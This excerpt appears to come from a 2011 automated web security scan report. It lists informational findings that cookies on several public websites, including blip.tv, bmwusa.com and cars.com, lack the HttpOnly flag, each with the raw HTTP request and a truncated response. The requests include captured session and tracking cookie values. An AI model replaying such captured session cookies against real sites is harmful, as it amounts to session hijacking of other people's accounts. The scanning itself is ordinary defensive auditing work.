GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:24:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...

14.678. http://www.blip.tv/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16917
Date: Tue, 25 Jan 2011 13:12:59 GMT
X-Varnish: 829691482
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

14.679. http://www.blip.tv/blogs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /blogs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10640
Date: Tue, 25 Jan 2011 13:13:02 GMT
X-Varnish: 496204649
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

14.680. http://www.blip.tv/prefs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /prefs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14134
Date: Tue, 25 Jan 2011 13:13:19 GMT
X-Varnish: 2104818017
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...

14.681. http://www.bmwusa.com/Standard/Content/Vehicles/2011/M/MExplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /Standard/Content/Vehicles/2011/M/MExplore.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • CHECK=XP9y6GTRm#@U; expires=Tue, 25-Jan-2011 13:13:55 GMT; path=/
  • NSC_CNX_21529_64.29.204.16=4f52b4193660;expires=Tue, 25-Jan-11 13:32:55 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Standard/Content/Vehicles/2011/M/MExplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error_Cookieless.aspx?DesiredUrl=/Standard/Content/Vehicles/2011/M/MExplore.aspx&Scheme=http
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 13:12:55 GMT
Connection: close
Set-Cookie: CHECK=XP9y6GTRm#@U; expires=Tue, 25-Jan-2011 13:13:55 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193660;expires=Tue, 25-Jan-11 13:32:55 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError_Cookieless.aspx%3fDesiredUrl%3d%2fStandard%2fContent%2fVehicles%2f2011%2fM%2fMExplore.aspx%26Scheme%3dhttp">
...[SNIP]...

14.682. https://www.bmwusa.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=UhmMf4pGAIGE3YTDimr5qpIoTBHmwhxAYkpY6FXQZsjsK8I-ZqVjCRQO3df8XUyuJtngRgB9HKWNLzF6c_n7ziqREw1V-qezTqpq1_AxFS77UoW0uG3VZ2TJGKX1-La1VBhilu45gcGoEftXkrZcay97fFto7jDpifD5PYt_8VVwD_IM9POySKnOwhgQCQ-GwEjTWvZM7u62v46uYW3ihZtKSsU1&t=3a010726 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:24 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/
Content-Length: 6794

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.DropShadowBehavior = function(element) {
AjaxControlToolkit.DropShadowBehavior.initializeBase(this, [element]);this._opacity = 1.0;t
...[SNIP]...

14.683. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fNaN&Scheme=http HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 231
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:15 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSecured%2fContent%2fForms%2fLogin.aspx%3fenc%3dmwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK">h
...[SNIP]...

14.684. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw== HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:12:50 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
Content-Length: 893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

14.685. https://www.bmwusa.com/Secured/NaN

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:14 GMT
Connection: keep-alive
Set-Cookie: WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

14.686. https://www.bmwusa.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=8vmmyJUcpAfwePI_vHjEZZzhNQ4xywI20eg8QPHXCFBLoYaZ-iotmrKPGOJcOPcKed2_9fi23ApLsbhQEjklRH9c1X-oNneXtDyJTnRsg1VCv4iu3joe2IkWTU-4dZUwd23uy7A-b_tZvv0ORXw7vC3BngAxxyWWKj2hWy2J5tMQ-eZXm9EI_5o6ZyuhxuFVQyt7rw2&t=634188751465741492 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 38101
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 25 Jan 2011 15:19:30 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/

var __aspxInvalidDimension=-10000;var __aspxInvalidPosition=-10000;var __aspxAbsoluteLeftPosition=-10000;var __aspxAbsoluteRightPosition=10000;var __aspxMenuZIndex=20000;var __aspxPopupControlZIndex=1
...[SNIP]...

14.687. https://www.bmwusa.com/jsenvconst.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:20 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/
Content-Length: 637

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

14.688. http://www.boattrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boattrader.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:45:55 GMT
  • TSef43b4=2ffdd2520e75126ede44933ba8ef34039e5be810eff911074d3e1425759e864aee104e3b; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:45:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:45:55 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=2ffdd2520e75126ede44933ba8ef34039e5be810eff911074d3e1425759e864aee104e3b; Path=/
Content-Length: 126523

<!-- dstolwebvm01-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Boats for Sale - Buy Boats, Sell Boats, Boating Resources, Boat Dealers, Parts and Accessories - Boat Trader </title>
   <meta http-equiv
...[SNIP]...

14.689. http://www.care2.com/news/news_post.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /news/news_post.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
  • c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news_post.html?url={u}&title={t} HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:34 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com
Location: http://www.care2.com/news/compose?sharehint=news&share[share_type]news&bookmarklet=Y&share[title]=%7Bt%7D&share[link_url]=%7Bu%7D&share[content]=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


14.690. http://www.cars.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • cars_persist=3863024812.20480.0000; expires=Mon, 24-Jan-2011 16:34:34 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: IBM_HTTP_Server
Location: http://www.cars.com/?aff=x22
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3863024812.20480.0000; expires=Mon, 24-Jan-2011 16:34:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cars.com/?af
...[SNIP]...

14.691. http://www.cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; expires=Sat, 05-Mar-2011 13:52:03 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:03 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; expires=Sat, 05-Mar-2011 13:52:03 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Last-Modified: Fri, 30 Jul 2010 00:37:43 GMT
Expires: Mon, 24 Jan 2011 14:07:03 GMT
